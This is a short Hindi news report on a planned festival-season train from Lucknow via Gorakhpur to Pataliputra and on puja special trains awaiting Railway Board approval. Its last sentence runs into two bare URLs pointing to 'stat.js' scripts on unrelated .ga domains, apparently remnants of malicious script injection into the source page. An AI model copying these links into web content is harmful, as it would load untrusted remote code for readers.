हर रोज हज़ारो लोग लखनऊ से दौड़ने वाली इस सुपरफास्ट एक्सप्रेस से बिहार आते और जाते है। मुख्य तौर पर गोरखपुर से पटना आने वाले रेलयात्रियों के लिए अच्छी खबर है। क्योकि त्योहारी सीजन सिर पर है और सभी अपने घर का सोच रहे हैं, ऐसे में त्योहार में भीड़ को देखते हुए रेल प्रशासन ने ट्रेन चलाने की तैयारी शुरू कर दी है। गोरखपुर से उत्तर प्रदेश और पटना की यात्रा करने वाले लोगों को मिलेगी सहूलियत। आपको बता दें, रेलवे ने एक ट्रेन लखनऊ से गोरखपुर होकर पाटलिपुत्र तक चलाने का फैसला किया है। 15 अक्टूबर से ट्रेन का सन्चालन शुरू करने की योजना है।
इस ट्रेन को चलाने का प्रस्ताव तैयार कर लिया गया है। रेलवे बोर्ड को प्रस्ताव भेजा जा जाएगा। बोर्ड से अनुमति मिलते ही इसे चलायें जाने की तैयारी है। यह ट्रेन भी अभी 30 नवंबर तक चलेगी। रेल प्रशासन ने रेलवे बोर्ड की सहमति पर गोरखपुर के रास्ते पांच पूजा स्पेशल चलाने का प्रस्ताव पहले ही तैयार कर बोर्ड को भेज दिया है। जिनमें अमरनाथ एक्सप्रेस, कोचीन एक्सप्रेस, दुर्ग एक्सप्रेस, ओखा एक्सप्रेस और पूर्वांचल एक्सप्रेस शामिल हैं।
रेलवे बोर्ड द्वारा अंतिम समय सारिणि तय करी जानी है। हालाँकि, रेल यात्रियों की परेशानी को देखते हुये गोरखपुर के रास्ते चलने वाली बाघ एक्सप्रेस और गोरखपुर से कोलकाता जाने वाली पुर्वान्चल एक्सप्रेस का प्रस्ताव भी बोर्ड को भेजा गया लेकिन राज्य सरकार की तरफ सेबिन् ट्रेनों को चलाने की अनुमति नहीं दी जा रही है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms